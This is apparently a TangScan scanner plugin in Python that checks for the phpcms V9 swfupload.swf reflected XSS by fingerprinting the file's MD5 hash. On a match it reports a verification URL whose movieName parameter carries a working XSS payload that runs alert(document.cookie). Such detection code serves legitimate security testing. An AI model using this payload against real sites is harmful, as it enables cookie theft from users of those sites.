#! /usr/bin/env python
# -*- coding: utf-8 -*-
import md5
from thirdparty import requests
from modules.exploit import TSExploit
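class TangScan(TSExploit):
    """Detection plugin for the phpcms V9 ``/swfupload.swf`` reflected XSS.

    The check is a pure fingerprint match: it downloads the bundled
    ``swfupload.swf`` from the target and compares its MD5 digest with the
    digest of the build described in the referenced advisory
    (wooyun-2014-069833). A match is reported as a finding.

    Because only one exact file hash is recognised, a negative result does
    not prove the target is unaffected: any other build of the file will
    simply not match.
    """

    def __init__(self):
        """Register plugin metadata, the ``url`` option and the result skeleton."""
        # Name the class explicitly: super(self.__class__, self) recurses
        # forever as soon as this plugin is subclassed.
        super(TangScan, self).__init__()

        # Static metadata describing the issue this plugin checks for.
        self.info = {
            "name": "phpcms V9 /swfupload.swf XSS",
            "product": "phpcmsv9",
            "product_version": "",
            "desc": "\nphpcms V9 /swfupload.swf XSS\n",
            "license": self.license.TS,
            "author": ["侦探911"],
            "ref": [
                {self.ref.wooyun: "http://www.wooyun.org/bugs/wooyun-2014-069833"},
            ],
            "type": self.type.xss,
            "severity": self.severity.low,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }

        # The only input is the base URL of the site to check; it is passed
        # through the framework's url_field converter.
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": ""
            }
        })

        # Result skeleton: status stays False unless verify() finds a match.
        self.register_result({
            "status": False,
            "data": {
            },
            "description": "",
            "error": ""
        })

    def md5(self, content):
        """Return the hexadecimal MD5 digest of *content*.

        MD5 is used here only to fingerprint a known file, not as a
        security control.
        """
        # hashlib replaces the md5 module (deprecated since Python 2.5 and
        # absent from Python 3); the digest it produces is identical.
        import hashlib

        return hashlib.md5(content).hexdigest()

    def verify(self):
        """Fetch the target's swfupload.swf and compare it with the known hash.

        On a request failure the exception text is stored in
        ``self.result.error`` and the method returns without a finding.
        On a hash match ``self.result.status`` is set to True and
        ``self.result.description`` carries the report text.
        """
        flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
        exp_url = "{domain}/statics/js/swfupload/swfupload.swf".format(
            domain=self.option.url.rstrip('/')
        )

        try:
            # NOTE(review): verify=False turns off TLS certificate validation
            # (assuming thirdparty.requests is the usual requests library), so
            # the body compared below is not authenticated. The timeout keeps
            # an unresponsive host from stalling the scan.
            response = requests.get(exp_url, verify=False, timeout=15)
        except Exception as e:
            # Deliberately broad: any transport failure is recorded on the
            # result instead of aborting the scan run.
            self.result.error = str(e)
            return

        # An error page or any other build of the file will not match the
        # digest, so only the exact known file is reported.
        if self.md5(response.content) == flash_md5:
            self.result.status = True
            self.result.description = "目标 {url} 存在反射XSS, 验证url: {verify_url}".format(
                url=self.option.url,
                verify_url=exp_url + "?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//"
            )

    def exploit(self):
        """Run the same fingerprint check as verify(); nothing further is done."""
        self.verify()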
# Script entry point: runs only when the file is executed directly.
if __name__ == "__main__":
    # Imported inside the guard, so importing this plugin as a module does
    # not load the framework runner.
    from modules.main import main

    # Hand a fresh plugin instance to the framework's main().
    main(TangScan())